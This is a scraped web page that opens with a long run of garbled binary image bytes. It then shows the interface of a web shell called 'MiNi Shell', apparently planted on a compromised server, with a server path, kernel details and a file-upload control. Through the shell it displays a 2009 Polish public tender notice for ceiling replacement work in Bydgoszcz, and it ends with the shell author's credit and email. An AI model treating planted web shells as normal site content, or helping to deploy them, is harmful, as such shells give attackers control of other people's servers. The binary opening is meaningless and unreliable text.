JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090512/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090512/144604-N-2009.html

<p class="kh_header"><b>Bydgoszcz: 20/P/2009</b><br>
<b>Numer ogłoszenia: 144604 - 2009; data zamieszczenia: 12.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Domów Miejskich "ADM" Spółka z o.o. , ul. Śniadeckich 1, 85-011 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3481600, faks 052 3481607.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.adm.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 20/P/2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wymiana stropu  ceramicznego  na żelbetowy  nad piwnica  w obrebie  podwórza  przy ul. Jagiellońskiej 2.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1   O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy
1   posiadają uprawnienia do wykonywania określonej działalności lub czynności, 
    jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, a w 
    szczególności
a   wykonawcy prowadzą działalność gospodarczą w zakresie odpowiadającym 
    przedmiotowi zamówienia
2  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem 
    technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią 
    pisemne zobowiązanie innych podmiotów do udostępnienia potencjału 
    technicznego i osób zdolnych do wykonywania zamówienia, a w szczególności 
    Wykonawca
a  dysponuje kierownikami budowy robót posiadającymi: 
    uprawnienia budowlane do kierowania robotami budowlanymi w specjalności 
    konstrukcyjno-budowlanej, lub odpowiadające im uprawnienia budowlane 
    wydane na podstawie poprzednio obowiązujących przepisów
b   wykaże co najmniej 1 zamówienie wykonane przez siebie w ciągu ostatnich 
    pięciu lat, odpowiadające swoim rodzajem i wartością robocie polegającej na 
    wykonaniu remontu lokalu mieszkalnego, budynku  lub innych prac w zakresie 
    robót ogólnobudowlanych na wartość co najmniej 40 tys. zł brutto           
    Wykonawca winien podać ilość osób jaką przewiduje skierować do realizacji 
     inwestycji. Niniejszy wymóg uzasadnia przepis §3 Rozporządzenia Ministra 
     Infrastruktury z dnia 06-02-2003r. w sprawie bezpieczeństwa i higieny pracy 
     podczas wykonywania robót budowlanych  DZ. U. Nr 47 poz. 401 - zgodnie z 
     załącznikiem nr 4C do SIWZ.
    w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o 
    udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał 
    techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie
3   znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
    zamówienia,
    w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o 
     udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał 
     ekonomiczny
4   nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na 
     podstawie przepisów art. 24 ust. 1 i 2 Pzp.
     w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez 
     dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe 
    dokumenty dla każdego z nich
5   złożyć oświadczenie, sporządzone według wzoru stanowiącego załącznik nr 3 do
    SIWZ, o spełnianiu warunków udziału w postępowaniu. 
2  Ocena spełniania warunków udziału wykonawcy w postępowaniu zostanie 
   dokonana wg formuły spełnia - nie spełnia  tj. na podstawie analizy załączonych
   do oferty dokumentów potwierdzających spełnianie warunków wymienionych w 
   pkt. 1 niniejszego rozdziału.
3  Niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem 
   wykonawcy z postępowania. Ofertę wykonawcy wykluczonego uznaje się za 
    odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1  Oświadczenie określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych - 
    wg wzoru Zamawiającego stanowiącego załącznik nr 3 do SIWZ
2  wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą
    uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich 
    kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do 
    wykonania zamówienia, a także zakresu wykonywanych przez nie czynności; lub
    pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do
    wykonania zamówienia, jeżeli w wykazie, o którym mowa wyżej, wykonawca 
   wskazał osoby, którymi będzie dysponował  - wg wzoru Zamawiającego 
   stanowiącego załączniki nr 4A do SIWZ   
3  Oświadczenie dotyczące zakresu prac jakie Wykonawca zamierza powierzyć do 
   wykonania podwykonawcy - załącznik nr 4 B do SIWZ 
4  Ilość osób przewidziana do realizacji niniejszego zamówienia wg załącznika nr 4C 
    do SIWZ  
5   Wykaz wykonanych w ciągu ostatnich pięciu lat robót budowlanych, a jeżeli
     okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających 
     swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia,  z 
     podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem 
     dokumentów potwierdzających, że roboty te zostały wykonane należycie - wg 
     wzoru Zamawiającego stanowiącego załącznik nr 5 do SIWZ 
6   Aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do 
     ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do
      rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego 
     nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
7   Oświadczenie potwierdzające, iż Wykonawca posiada decyzję z zakresu 
    gospodarowania odpadami lub złożył informację o wytwarzanych odpadach do 
    właściwego organu, w przypadku, kiedy ten wymóg nie dotyczy Wykonawcy, 
    musi on podać w oświadczeniu uzasadnienie - patrz art. 17 ust. 1 ustawy o
     odpadach - Dz. U. z 2007r. Nr 39 poz. 251 z póź. zm.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.adm.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Bydgoszcz ul. Gdańska 9 IIp  Sekcja Zamówień Publicznych.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2009 godzina 10:00, miejsce: Bydgoszcz ul. Gdanska 9  IIp Sekcja Zamowień Publicznych.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com